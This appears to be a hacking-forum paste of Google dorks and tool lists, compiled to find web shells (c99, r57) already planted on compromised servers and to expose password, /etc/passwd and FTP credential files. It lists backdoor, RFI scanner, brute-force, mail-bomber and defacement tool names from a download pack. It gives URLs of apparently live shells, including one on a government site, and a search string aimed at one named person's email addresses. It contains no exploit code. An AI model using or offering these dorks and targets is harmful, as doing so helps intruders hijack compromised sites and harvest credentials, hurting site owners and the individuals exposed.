,,,,,...maxhex...,,,,, www.saudihack.com all about dorks for shells languge "ar" and "en" and "ru" - phpshell -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= (intitle:r57shell | intitle:c99shell) +uname =-=-=-=-=-=-=- “index of /etc/passwd” روت http://www.iett.gov.tr/kitap/kitap.php?act=f =-=-=-=-=-=-=- http://www.zone-h.net/defaced/2005/09/30/abbax.de/messages/shell.php =================== c99.php uid=0(root)uid=0(root)uid=0(root) =-=-=-=-=-= inurl:c99.php uid=0(root) root c99.php ============= http://flymusic.co.uk/flymusic/%20hackers-got-their-2-mins-of-fame/ -=-=-=-=-= http://qtrmonster.com/includes/enc_licensing_servers.php =-=-=-=-=-=-=- امر بن قحبه inurl:phpshell.php;filetype:php + c99.php php ++ inurl:c99.php;config:php + inurl:c99.php;root:php + inurl:c99.php;shadow + “index of cgi-bin” + “Welcome to phpMyAdmin” ” Create new database” + “index of /etc/passwd” + inurl:/c99.php site:edu + http://search.live.com/results.aspx?q=inurl-c99.php&FORM=SSRE2 + http://www.google.com/search?hl=en&q=+Shelley+Staples+virginia.edu&btnG=Search + 1++shelly++%++@juno.com++++++@charter.net++++++++@yahoo.com+++++@bellsouth.net++++@hotmail.com++2008+++txt&max=100&client=SWweb&summaries=&sort=source&source= ajan.asp Antichat Shell v1.3.php Ayyildiz Tim -AYT- Shell v 2.1 Biz.php aZRaiLPhp v1.0.php backdoor v1.0.php backup.php backupsql.php bomb.php bomber.php bypass.php c100.php c100.txt.php c1001.php c99.php c991.php c992.php c99b.txt.php c99shell.php c99_madnet.php c99_PSych0.php c99_w4cking.php casus15.php cmd.asp Crystal.php CrystalShell v.1.php ctt_sh.php Cyber Shell (v 1.0).php cybershell.php CyberSpy5.Asp dbps.php dC3 Security Crew Shell PRiV.php denger.php Dive Shell 1.0 - Emperor Hacking Team.php Dx.php DxGotoFTP.php DxShell.1.0.php DXshell.php ELMALISEKER Backd00r.asp emailer.php fatal.html fm.php functions.inc.php GFS web-shell ver 3.1.7 - PRiV8.php gfs_sh.php h10.php h4ntu shell [powered by tsoi].php header.inc.php hund.php i18n.inc.php iMHaPFtp.php index.php indexer.asp ironshell.php JspWebshell 1.2.php KAdot Universal Shell v0.1.6.php lama.php ------------------------------private lamashell.php ----------------------private lamashell3.0.php -----------------------------------private licence_apache.php licence_mysql.php licence_php5.php licence_phpmyadmin.php licence_sqlitemanager.php Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php load_shell.php Macker's Private PHPShell.php macker.php mackert shell udated.php Mailer.php mailer3.php matamu.php myshell.php Mysql interface v1.0.php MySQL Web Interface Version 0.8.php mysql.php mysql_tool.php n3t.txt NCC-Shell.php network.php new.php NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php nshell.php nstview.php nstview1.php nsTView_2.1.php ntdaddy.asp Perl Web Shell by RST-GHC.pl PH Vayv.php PHANTASMA.php PHP Backdoor v1.php PHP Shell.php php-backdoor.php php-include-w-shell.php php.php phpinfo.php phpinj.php pHpINJ1.php phpshell.php PHP_BackDoor_v1.5.php PHP_Shell_v1.7.php phvayv.php Private-i3lue.php pws.php r.php r57.php r571.php r57_iFX.php r57_kartal.php r57_Mohajer22.php rdc.php RedhatC99 [login=redhat-pass=root].php Rem View.php remview.php Revengans.php rootshell v2.0.php rootshell.php Rootshell.v.1.0.php rst.php ru24_post_sh.php Russian.php s72 Shell v1.1 Coding.php Safe0ver Shell -Safe Mod Bypass By Evilc0der.php Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php shell.php shell1.php SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php simple-backdoor.php simple_cmd.php SimShell 1.0 - Simorgh Security MGZ.php SnIpEr_SA Shell.php styles.css test.php test.txt test1.php tuerk shell.php upload.php Uploader.php versions.inc.php WinX Shell.php Worse Linux Shell.php xinfo.php xpl.php zacosmall.php 1.Аccept Language 2.Ajan.asp 3.Ajax PHP Command Shell 4.Antichat Shell v1.3 5.Asmodeus v0.1.pl 6.Ayyildiz Tim -AYT- Shell v 2.1 Biz 7.aZRaiLPhp v1.0 8.backdoor1 9.backdoorfr 10.backup.php 11.backupsql 12.backupsql.php 13.Blind Shell.cpp 14.c99 15.c99(1).php 16.c100 17.c2007.php 18.Casus15.php 19.cgi-python.py 20.CMD.asp 21.CmdAsp.asp 22.connectback2.pl 23.Crystal 24.ctt_sh 25.ctt_sh.php 26.cybershell 27.cybershell.php 28.CyberSpy5.Asp 29.dC3 Security Crew Shell PRiV 30.Dive Shell 1.0 - Emperor Hacking Team 31.DTool Pro 32.Dx 33.DxShell_hk.php 34.Dx.php 35.EFSO_2.asp 36.Elmali Seker.asp 37.elmaliseker.asp 38.Fatalshell.php 39.fuckphpshell 40.GFS web-shell ver 3.1.7 - PRiV8 41.gfs_sh 42.gfs_sh.php 43.h4ntu shell [powered by tsoi] 44.img.php 45.iMHaPFtp 46.iMHaPFtp.php 47.Inderxer.asp 48.indexer.asp 49.ironshell 50.Java Shell.js 51.JspWebshell 1.2 52.KAdot Universal Shell v0.1.6.html 53.Klasvayv.asp 54.lamashell 55.Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit 56.load_shell 57.load_shell.php 58.lurm_safemod_on.cgi 59.mailer3.php 60.matamu 61.Moroccan Spamers Ma-EditioN By GhOsT 62.myshell.php 63.Mysql interface v1.0 64.MySQL Web Interface Version 0.8 65.mysql.php 66.mysql_shell 67.mysql_tool.php 68.NCC-Shell 69.network.php 70.NetworkFileManagerPHP 71.NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version 72.Nshell (1).php 73.nshell.php 74.nstview.php 75.NT Addy.asp 76.ntdaddy.asp 77.perlbot.pl 78.PH Vayv.php 79.PHANTASMA 80.PHP Backdoor Connect.pl 81.PHP Shell.php 82.phpbackdoor15 83.php-backdoor 84.php-include-w-shell 85.pHpINJ.php 86.phpjackal 87.phpshell17 88.PHPRemoteView 89.Phyton Shell.py 90.phvayv.php 91.Private-i3lue 92.pws 93.pws.php 94.ru24_post_sh 95.r57 Shell.php 96.r57.php 97.r577.php 98.Rader.asp 99.Rem Exp.asp 100.Rem View.php 101.rootshell 102.ru24_post_sh.php 103.Russian.php 104.s72 Shell v1.1 Coding 105.s.php 106.Safe0ver Shell -Safe Mod Bypass By Evilc0der 107.Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 108.Server Variables.asp 109.shell.php 110.shellbot.pl 111.SimAttacker - Vrsion 1.0.0 - priv8 4 My friend 112.simple_cmd 113.simple-backdoor 114.SimShell 1.0 - Simorgh Security MGZ 115.Sincap.php 116.smtpd.py 117.SnIpEr_SA Shell 118.spy.php 119.sql.php 120.telnet.cgi 121.telnet.pl 122.telnetd.pl 123.Test.php 124.Tool.asp 125.Uploader.php 126.w3d.php 127.w4k.php 128.w.php 129.wacking.php 130.webshell 131.WebShell.cgi 132.WinX Shell 133.Worse Linux Shell 134.xinfo.php 135.zacosmall 136.zacosmall.php 137.zehir4.asp 138.Zehir 4.asp =========================================================================== - C99madShell v. 2.0 madnet edition - c99-safe-mode - c99edit - c99shell - DownloaderToFTP - GFS Web-Shell ver 4.0.0.0 - NetworkFileManager - NiX Remote Web Shell™ - r57MySQL_FileViewer - r57shell - MySQLBackUpAll - MySQLBackUpOnce - Sql - a_gedit - Antichat - bk - c2007 - Casus15 - CmdAsp - Csh - Ctt_sh - Cybershell - DxShell - gfs_sh - grp-2018 - Hidshell - iMHaPFtp - Load_shell - NFM - NGH - Nixrem - NST - Phvayvv - Predator - r0t - Remview - Zacosmall - Rashell v.1.31 - Xoce 1.5 - Xoce 1.7 - img - mailer3 - myshell - mysql_tool - mysql - network - nshell - ru24_post_sh - pHpINJ - PHP Shell - Pws - KA_uShell - Sincap - telnet - telnetd - smtpd.py - xinfo - CyberSpy5.Asp - Indexer.asp - Klasvayv.asp - NTdaddy.asp - Reader.asp - RemExp.asp - Zehir4.asp - Ajan.asp - EFSO_2.asp - Elmali Seker.asp - Server Variables.asp - Tool.asp - WebShell.pl - PHP Backdoor Connect.pl - perlbot.pl - shellbot.pl - r57pws.pl - lurm_safemod_on.pl - Asmodeus v0.1.pl - connectback2.pl - Java Shell.js - Phyton Shell.py - cgi-python.py ============================================================================ 1.Аccept Language 2.Ajan.asp 3.Ajax PHP Command Shell 4.Antichat Shell v1.3 5.Asmodeus v0.1.pl 6.Ayyildiz Tim -AYT- Shell v 2.1 Biz 7.aZRaiLPhp v1.0 8.backdoor1 9.backdoorfr 10.backup.php 11.backupsql 12.backupsql.php 13.Blind Shell.cpp 14.c99 15.c99(1).php 16.c100 17.c2007.php 18.Casus15.php 19.cgi-python.py 20.CMD.asp 21.CmdAsp.asp 22.connectback2.pl 23.Crystal 24.ctt_sh 25.ctt_sh.php 26.cybershell 27.cybershell.php 28.CyberSpy5.Asp 29.dC3 Security Crew Shell PRiV 30.Dive Shell 1.0 - Emperor Hacking Team 31.DTool Pro 32.Dx 33.DxShell_hk.php 34.Dx.php 35.EFSO_2.asp 36.Elmali Seker.asp 37.elmaliseker.asp 38.Fatalshell.php 39.fuckphpshell 40.GFS web-shell ver 3.1.7 - PRiV8 41.gfs_sh 42.gfs_sh.php 43.h4ntu shell [powered by tsoi] 44.img.php 45.iMHaPFtp 46.iMHaPFtp.php 47.Inderxer.asp 48.indexer.asp 49.ironshell 50.Java Shell.js 51.JspWebshell 1.2 52.KAdot Universal Shell v0.1.6.html 53.Klasvayv.asp 54.lamashell 55.Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit 56.load_shell 57.load_shell.php 58.lurm_safemod_on.cgi 59.mailer3.php 60.matamu 61.Moroccan Spamers Ma-EditioN By GhOsT 62.myshell.php 63.Mysql interface v1.0 64.MySQL Web Interface Version 0.8 65.mysql.php 66.mysql_shell 67.mysql_tool.php 68.NCC-Shell 69.network.php 70.NetworkFileManagerPHP 71.NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version 72.Nshell (1).php 73.nshell.php 74.nstview.php 75.NT Addy.asp 76.ntdaddy.asp 77.perlbot.pl 78.PH Vayv.php 79.PHANTASMA 80.PHP Backdoor Connect.pl 81.PHP Shell.php 82.phpbackdoor15 83.php-backdoor 84.php-include-w-shell 85.pHpINJ.php 86.phpjackal 87.phpshell17 88.PHPRemoteView 89.Phyton Shell.py 90.phvayv.php 91.Private-i3lue 92.pws 93.pws.php 94.ru24_post_sh 95.r57 Shell.php 96.r57.php 97.r577.php 98.Rader.asp 99.Rem Exp.asp 100.Rem View.php 101.rootshell 102.ru24_post_sh.php 103.Russian.php 104.s72 Shell v1.1 Coding 105.s.php 106.Safe0ver Shell -Safe Mod Bypass By Evilc0der 107.Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 108.Server Variables.asp 109.shell.php 110.shellbot.pl 111.SimAttacker - Vrsion 1.0.0 - priv8 4 My friend 112.simple_cmd 113.simple-backdoor 114.SimShell 1.0 - Simorgh Security MGZ 115.Sincap.php 116.smtpd.py 117.SnIpEr_SA Shell 118.spy.php 119.sql.php 120.telnet.cgi 121.telnet.pl 122.telnetd.pl 123.Test.php 124.Tool.asp 125.Uploader.php 126.w3d.php 127.w4k.php 128.w.php 129.wacking.php 130.webshell 131.WebShell.cgi 132.WinX Shell 135.Worse Linux Shell 136.xinfo.php 137.zacosmall 138.zacosmall.php 139.zehir4.asp 140.Zehir 4.asp ============================================================================ Rar arşivindekiler: -Ajan.asp -Aspduzenle.asp:)(Cyberspy5) -Backdoor v1.0.php -Banner.php -Belg2.asp (Cyberspy5=))[Belgelerim klasöründeydim aklıma esti:)] -Buneki.php (C99) =) -Bypass.php -Casus15.php -Cmd.exe (Serverda komut çalıştırmak için) -Doksandokuz.php(C99:))) -EFSO_2.asp -Ekinox.php -Elmaliseker.asp -Fatal.php -Fdumanli.asp(Cyberspy5) -İndexer.asp -Klasvayv2.asp (klasvayv:)) -Nhd.asp -Nstview.php -Phpinj.php -Phpshell.php -R57shell.php -R57turkce.php -Remview.php -Rootshell v2.0.php -Search.php ============================================================================ The GodFather Group Icon Группа: Admin Сообщений: 474 Регистрация: 13-Feb 07 Пользователь №: 440 NiX H4CK m3G4 p4ck 2oo6 ••• sH3ll ••• -Antichat Shell v1.3 -Ayyildiz Tim -AYT- Shell v 2.1 Biz -aZRaiLPhp v1.0 -c100 -CrystalShell v.1 -Cyber Shell (v 1.0) -dC3 Security Crew Shell PRiV8 -Dive Shell 1.0 - Emperor Hacking Team -DxShell.1.0 -ELMALISEKER Backd00r -GFS web-shell ver 3.1.7 - PRiV8 -h4ntu shell [powered by tsoi] -JspWebshell 1.2 -KAdot Universal Shell v0.1.6 -Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit -Macker's Private PHPShell -Mysql interface v1.0 -MySQL Web Interface Version 0.8 -NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version -Perl Web Shell by RST-GHC -Private-i3lue -RedhatC99 [login=redhat-pass=root] -****.v.1.0 -s72 Shell v1.1 Coding -Safe0ver Shell -Safe Mod Bypass By Evilc0der -Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 -SimAttacker - Vrsion 1.0.0 - priv8 4 My friend -SimShell 1.0 - Simorgh Security MGZ -SnIpEr_SA Shell -WinX Shell -Worse Linux Shell ••• Vuln Scan ••• -GoogleRFI + MassInjector in Perl -MaD-CW XSS & Remote File Inclusion Scanner [Win] -PerlGroup Scanner RFI -REMOTE FILE INCLUDE SCANNER SHELLBOT -RFI Scan created by Ironfist -Scanutil 1.1 by ToRNadO -Shellbot with VulnScan m0d by AdvAnCeD -RFI-SQL scanner -VulnScan v6 + Spread + Defacing Tool v2 -VulnScan v7 -Final- By k1n9k0ng -VulnScan v8 by PcW0rm [iTA by s[H]4g] -VulnScan v9 -XeviL Perl Script 1.0 By ar3s ••• Oth3r t00lz ••• -BUNNY BOT Version 0.1 -ConnectBack Backdoor Shell vs 1.0 by LorD -Flud2Mail (F2M) 0.1 -FTp brute forcer -iMHaBiRLiGi PhpFtp V1.1 -LocalLinuxExploitFinder -Mass Defacer And Log Eraser PRiV8 -Multi-thread FTP scanner v0.2.5 by Inode -NetGaurd FTP Brute Force -PHProxy -RST MySQL tools -scan - K. Script v0.3 Beta By DiVaBoY -Simple FTP brute by ReZEN -S l a v e Z e r o IRC B0t -Stealth ShellBot Vers 0.2 by Thiago X -inDEXER And ReaDer -ZER0CoOLz Mail BomBER Огромный респект Румынцым за такой пак s[H]4g ´deL|R|UMp´ i|\|sTi|\|cT[6] r00tm|nd f|_|k3r @ d4rk-r3v-t34m И хочу напомнить Администрация сайта и хостинга не несет ответственности за содержимое файлов, размещенных в обменнике! Скачивая файлы, в обязательном порядке проверяйте их антивирусом! Вы используете данные файлы на свой страх и риск! Скачать d4rk-r3v-t34m ========================================================================== ••• sH3ll ••• -Antichat Shell v1.3 -Ayyildiz Tim -AYT- Shell v 2.1 Biz -aZRaiLPhp v1.0 -c100 -CrystalShell v.1 -Cyber Shell (v 1.0) -dC3 Security Crew Shell PRiV8 -Dive Shell 1.0 - Emperor Hacking Team -DxShell.1.0 -ELMALISEKER Backd00r -GFS web-shell ver 3.1.7 - PRiV8 -h4ntu shell [powered by tsoi] -JspWebshell 1.2 -KAdot Universal Shell v0.1.6 -Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit -Macker's Private PHPShell -Mysql interface v1.0 -MySQL Web Interface Version 0.8 -NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version -Perl Web Shell by RST-GHC -Private-i3lue -RedhatC99 [login=redhat-pass=root] -****.v.1.0 -s72 Shell v1.1 Coding -Safe0ver Shell -Safe Mod Bypass By Evilc0der -Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 -SimAttacker - Vrsion 1.0.0 - priv8 4 My friend -SimShell 1.0 - Simorgh Security MGZ -SnIpEr_SA Shell -WinX Shell -Worse Linux Shell ••• Vuln Scan ••• -GoogleRFI + MassInjector in Perl -MaD-CW XSS & Remote File Inclusion Scanner [Win] -PerlGroup Scanner RFI -REMOTE FILE INCLUDE SCANNER SHELLBOT -RFI Scan created by Ironfist -Scanutil 1.1 by ToRNadO -Shellbot with VulnScan m0d by AdvAnCeD -RFI-SQL scanner -VulnScan v6 + Spread + Defacing Tool v2 -VulnScan v7 -Final- By k1n9k0ng -VulnScan v8 by PcW0rm [iTA by s[H]4g] -VulnScan v9 -XeviL Perl Script 1.0 By ar3s ••• Oth3r t00lz ••• -BUNNY BOT Version 0.1 -ConnectBack Backdoor Shell vs 1.0 by LorD -Flud2Mail (F2M) 0.1 -FTp brute forcer -iMHaBiRLiGi PhpFtp V1.1 -LocalLinuxExploitFinder -Mass Defacer And Log Eraser PRiV8 -Multi-thread FTP scanner v0.2.5 by Inode -NetGaurd FTP Brute Force -PHProxy -RST MySQL tools -scan - K. Script v0.3 Beta By DiVaBoY -Simple FTP brute by ReZEN -S l a v e Z e r o IRC B0t -Stealth ShellBot Vers 0.2 by Thiago X -inDEXER And ReaDer ============================================================================ -Ajan.asp -Aspduzenle.asp(Cyberspy5) -Backdoor v1.0.php -Banner.php -Belg2.asp (Cyberspy5=))[Belgelerim klasöründeydim aklıma esti] -Buneki.php (C99) =) -Bypass.php -Casus15.php -Cmd.exe (Serverda komut çalıştırmak için) -Doksandokuz.php(C99)) -EFSO_2.asp -Ekinox.php -Elmaliseker.asp -Fatal.php -Fdumanli.asp(Cyberspy5) -İndexer.asp -Klasvayv2.asp (klasvayv) -Nhd.asp -Nstview.php -Phpinj.php -Phpshell.php -R57shell.php -R57turkce.php -Remview.php -Rootshell v2.0.php -Search.php ========================================================================== backdoor_fr.php phpjackal.php PHPRemoteView.php webshell.php c99_w4cking.php Private-i3lue.php mysql_shell.php h4ntu shell [powered by tsoi].php r57shell.php GFS web-shell ver 3.1.7 - PRiV8.php backdoor.php php-include-w-shell.php SnIpEr_SA Shell.php load_shell.php x2300.txt cybershell.php elmuh.php myshell.php ver.php mysql_tool.php rootshell (2).php shell.php backupsql.php Mysql interface v1.0.php NCC-Shell.php dC3 Security Crew Shell PRiV.php PHP Shell.php pws.php ebypass.php nstview.php PH Vayv.php Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php lamashell.php s72 Shell v1.1 Coding.php Crystal.php gfs_sh.php c99_madnet.php rootshell.php aZRaiLPhp v1.0.php phpbackdoor.php ru24_post_sh.php ****phpshell.php r57_Mohajer22.php su.php SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php KAdot Universal Shell v0.1.6.php phpshell17.php nshell.php DTool Pro.php zacosmall.php Worse Linux Shell.php nstview (2).php SimShell 1.0 - Simorgh Security MGZ.php Dive Shell 1.0 - Emperor Hacking Team.php matamu.php WinX Shell.php r57_iFX.php kobrashell.php Dx.php JspWebshell 1.2.php ctt_sh.php r57.php mysql.php pHpINJ.php Safe0ver Shell -Safe Mod Bypass By Evilc0der.php r57_kartal.php iMHaPFtp.php NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php c100.php simple_cmd.php sql-shell.php NetworkFileManagerPHP.php MySQL Web Interface Version 0.8.php Uploader.php simple-backdoor.php PHANTASMA.php nr.php Moroccan Spamers Ma-EditioN By GhOsT.php ironshell.php Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php kruis.php c99_locus7s.php =========================================================================== Dork shadow http://th0r.info/?p=66 inurl:/db/main.mdb |ASP-Nuke passwords ------------------- filetype:cfm "cfapplication |ColdFusion source with potential passwords name" password ------------------- filetype:pass |dbman credentials pass intext:userid ------------------- allinurl:auth_user_file.txt |DCForum user passwords ------------------- eggdrop filetype:user user |Eggdrop IRC user credentials ------------------- filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials ------------------- filetype:url +inurl:"ftp://" |FTP bookmarks cleartext passwords +inurl:"@" ============================================================================ Search String ---------------- ---------------------- 79 13.30% intitle:r57shell uname 67 11.28% inurl:c99.php 52 8.75% (intitle:r57shell | intitle:c99shell) uname 44 7.41% intitle:c99shell uname 36 6.06% intitle:r57shell 28 4.71% c99shell 24 4.04% intitle:r57shell filetype:php 24 4.04% intitle:r57shell uname -bbpress -ihackstuff 19 3.20% intitle:c99shell 15 2.53% allinurl:c99.php 14 2.36% allintitle: r57shell 12 2.02% r57shell 11 1.85% intitle:r57shell uname -bbpress 7 1.18% allintitle: c99shell 7 1.18% c99.php 6 1.01% intitle:c99shell filetype:php 6 1.01% inurl:/c99.php 4 0.67% allintitle:c99shell 4 0.67% intitle:c99shell) uname 4 0.67% intitle:r57shell | intitle:c99shell) uname 4 0.67% shell drwxrwxrwx c99 3 0.51% (intitle:r57shell uname 3 0.51% (intitle:r57shell) uname 3 0.51% [intitle:r57shell] uname 3 0.51% allintitle: r57shell filetype:php 3 0.51% allintitle:r57shell 3 0.51% intitle:r57shell) uname 3 0.51% inurl:c99.php uname 3 0.51% m3rhametsiz c99 shell 2 0.34% ! r57shell 1.3 2 0.34% (intitle:r57shell | intitle:bypassshell) uname 2 0.34% allintitle: - r57shell 2 0.34% allinurl: /c99.php 2 0.34% allinurl: c99.php 2 0.34% c99.phpact 2 0.34% intitle:/c99shell 2 0.34% intitle:c99shell uname -bbpress -ihackstuff 2 0.34% intitle:r57shell uname -bbpress -a 2 0.34% intitle:r57shell- 2 0.34% linux c99shell host 2 0.34% m.a.t. engine 1 0.17% !c99shell93c99shell! 1 0.17% 'intitle:r57shell | intitle:c99shell) uname' 1 0.17% (c99shell php) uname 1 0.17% (intitle:c100shell | intitle:r57shell) uname 1 0.17% (intitle:c99shell | intitle:r57shell) uname 1 0.17% (intitle:r57shell | inititle:c99shell) uname 1 0.17% (intitle:r57shell | intitle:c99shell] uname 1 0.17% (intitle:r57shell | intitle:c9shell) uname 1 0.17% (ok) c99shell powered by config 1 0.17% * - c99shell 1 0.17% *ok* c99shell 1 0.17% ------------------------------------------*c99shell 1 0.17% /9{*9}8):c99shell 1 0.17% 1. intitle:r57shell uname -bbpress 1 0.17% [intitle:c99shell | intitle:r57shell] uname 1 0.17% [intitle:r57shell | intitle:c99shell] uname 1 0.17% [intitle:r57shell |intitle:c99shell uname 1 0.17% allintitle: c99shell ext:php 1 0.17% allintitle: c99shell filetype:php 1 0.17% allintitle:c99shell filetype:php 1 0.17% allintitle:c99shellext:php 1 0.17% allinurl: c99 php 1 0.17% allinurl:.c99.php 1 0.17% allinurl:/c99.php 1 0.17% basel stellar library 1 0.17% c99 r57shell 1 0.17% c99.phpact= 1 0.17% c99shell *ok* (linux) 1 0.17% c99shell 1.0 1 0.17% c99shell host 1 0.17% c99shell inurl:c99.php 1 0.17% c99shell*19*c99shell 1 0.17% ext:php intitle:c99shell 1 0.17% filetype:php c99shell 1 0.17% filetype:php intitle:r57shell 1 0.17% filetype:php inurl:c99 1 0.17% how to get zend opt info in ssh 1 0.17% intext:r57shell [phpinfo] 1 0.17% intitle: c99shell 1 0.17% intitle: shell * r57shell filetype:php 1 0.17% intitle:- c99shell 1 0.17% intitle:/r57shell 1 0.17% intitle:> - c99shell 1 0.17% intitle:c99shell ext:php 1 0.17% intitle:c99shell intext:uname -a: filetype:php 1 0.17% intitle:c99shell inurl:/.php intext: 1 0.17% intitle:c99shell inurl:c99.php 1 0.17% intitle:c99shell) arama kodları 1 0.17% intitle:r57shell '[phpinfo]' filetype:php 1 0.17% intitle:r57shell filetype:php intext:phpinfo 1 0.17% intitle:r57shell intext:r57shell filetype:php 1 0.17% intitle:r57shell intext:uname 1 0.17% intitle:r57shell uname - 1 0.17% intitle:r57shell uname -save_mode=1 -bbpress -ihackstuff 1 0.17% intitle:r57shell uname 2007 1 0.17% inurl:''c99.php'' 1 0.17% inurl::c99.php 1 0.17% inurl:c99 shell uname 1 0.17% inurl:ftpquickbrute 1 0.17% inurl:â€�/c99.php/â€� 1 0.17% linux c99shell powered by shell 1 0.17% lnumrec pwd 1 0.17% ntitle:r57shell | intitle:c99shell) uname 1 0.17% php curl.ini 1 0.17% phpinfo() inurl:c99 1 0.17% r57shell 1.3 1 0.17% r57shell cpu 1 0.17% r57shell komut 1 0.17% r57shell off 1 0.17% r57shell phpinfo 1 0.17% r57shell {php ini] 1 0.17% stellar spectral synthesis 1 0.17% thibault lejeune 2007 1 0.17% this program makes use of the zend scripting language engine: s 1 0.17% uname -a r57shell 1 0.17% uname -a: linux c99shell 1 0.17% uname intitle:r57shell 1 0.17% uname: linux -a c99shell 1 0.17% |intitle:r57shell ============================================================================ Make Dir. [ ok ] safe-mode: off (not secure) drwxrwxrwx c99shell inurl:c99.php inurl:c99.php uid=0(root) root c99.php "Captain Crunch Security Team" inurl:c99 download c99.php download c99.php download c99.php inurl:c99.php inurl:c99.php allinurl: c99.php inurl:c99.php allinurl: c99.php inurl:"/c99.php" allinurl: c99.php inurl:c99.php inurl:"c99.php" c99shell inurl:c99.php uid=0(root) c99shell powered by admin c99shell powered by admin inurl:"/c99.php" inurl:c99.php inurl:c99.php inurl:c99.php c99 shell v.1.0 (roots) inurl:c99.php allintitle: "c99shell" inurl:"c99.php inurl:"c99.php allinurl: "c99.php" inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname intitle:C99Shell v. 1.0 pre-release +uname allinurl: "c99.php" inurl:c99.php inurl:"c99.php" inurl:"c99.php" inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php inurl:"c99.php" c99shell inurl:c99.php inurl:"c99.php" allinurl:c99.php inurl:"/c99.php inurl:c99.php? inurl:/c99.php+uname allinurl:"c99.php" allinurl:c99.php inurl:"c99.php" inurl:"c99.php" allinurl:c99.php allinurl:c99.php? allinurl:c99.php? allinurl:c99.php? "inurl:c99..php" allinurl:c99.php c99shell [file on secure ok ]? inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php powered by Captain Crunch Security Team allinurl:c99.php "c99.php" filetype:php allinurl:c99.php inurl:c99.php allinurl:.c99.php "inurl:c99.php" c99. PHP-code Feedback Self remove allinurl:c99.php download c99.php allinurl:c99.php inurl:c99.php allinurl: "c99.php" allinurl:c99.php allinurl:c99.php c99shell inurl:c99.php inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname allinurl:"c99.php" inurl:c99.php inurl:c99.php inurl:c99.php inurl:c99.php safe-mode: off (not secure) drwxrwxrwx c99shell inurl:/c99.php inurl:"c99.php" inurl:c99.php inurl:c99.php c99.php download inurl:c99.php inurl:"c99.php" inurl:/c99.php inurl:"c99.php?" inurl:c99.php inurl:c99.php files/c99.php c99shell filetype:php -echo inurl:c99.php inurl:c99.php inurl:"c99.php" inurl:c99.php uid=0(root) allinurl:c99.php inurl:"c99.php" inurl:"c99.php" inurl:"/c99.php" intitle:"C99shell" inurl:"/c99.php" intitle:"C99shell" inurl:"/c99.php" intitle:"C99shell" C99Shell v. 1.0 pre-release build #5 inurl:c99.php inurl:c99.php --[ c99shell v. 1.0 pre-release build #16 c99shell linux infong c99shell linux infong C99Shell v. 1.0 pre-release build !C99Shell v. 1.0 beta! Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout !c99shell v. 1+Safe-mode: OFF (not secure) "C99Shell v. 1.0 pre-release build " intitle:c99shell +filetype:php inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout intitle:!C99Shell v. 1.0 pre-release build #16! root !C99Shell v. 1.0 pre-release build #5! inurl:"c99.php" C99Shell v. 1.0 pre-release build #16! c99shell v. 1.0 pre-release build #16 intitle:c99shell intext:uname allintext:C99Shell v. 1.0 pre-release build #12 c99shell v. 1.0 pre-release build #16 --[ c99shell v. 1.0 pre-release build #15 | Powered by ]-- allinurl: "c99.php" allinurl: "c99.php" Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout "c99shell v 1.0" ftp apache inurl:c99.php c99shell+v.+1.0 16 C99Shell v. 1.0 pre-release build #16 download intitle:c99shell "Software: Apache" allinurl: c99.php allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout powered by Captain Crunch Security Team powered by Captain Crunch Security Team !C99Shell v. 1.0 pre-release build #5! c99shell v. 1.0 release security c99shell v. 1.0 pre-release build inurl:c99.php c99shell [file on secure ok ]? C99Shell v. 1.3 Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php uid=0(root) powered by Captain Crunch Security Team C99Shell v. 1.0 pre-release build #16 c99shell[on file]ok c99shell[file on ]ok Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php "C99Shell v. 1.0 pre" =C99Shell v. 1.0 pre-release Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout c99shell v. pre-release build inurl:c99.php c99 shell inurl:c99.php c99 shell powered by Captain Crunch Security Team inurl:c99.php inurl:c99.php !C99Shell v. 1.0 pre-release build #5! intitle:"c99shell" filetype:php root intitle:"c99shell" Linux infong 2.4 C99Shell v. 1.0 beta ! C99Shell v. 1.0 pre-release build # inurl:"c99.php" allintext:C99Shell v. 1.0 pre-release build #12 "C99Shell v. 1.0 pre" powered by Captain Crunch Security Team Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:/c99.php? allinurl:c99.php intitle:C99Shell pre-release inurl:"c99.php" powered by Captain Crunch Security Team inurl:c99.php C99Shell v. 1.0 pre-release build #16! allinurl:c99.php C99Shell v. 1.0 pre-release build #16 administrator 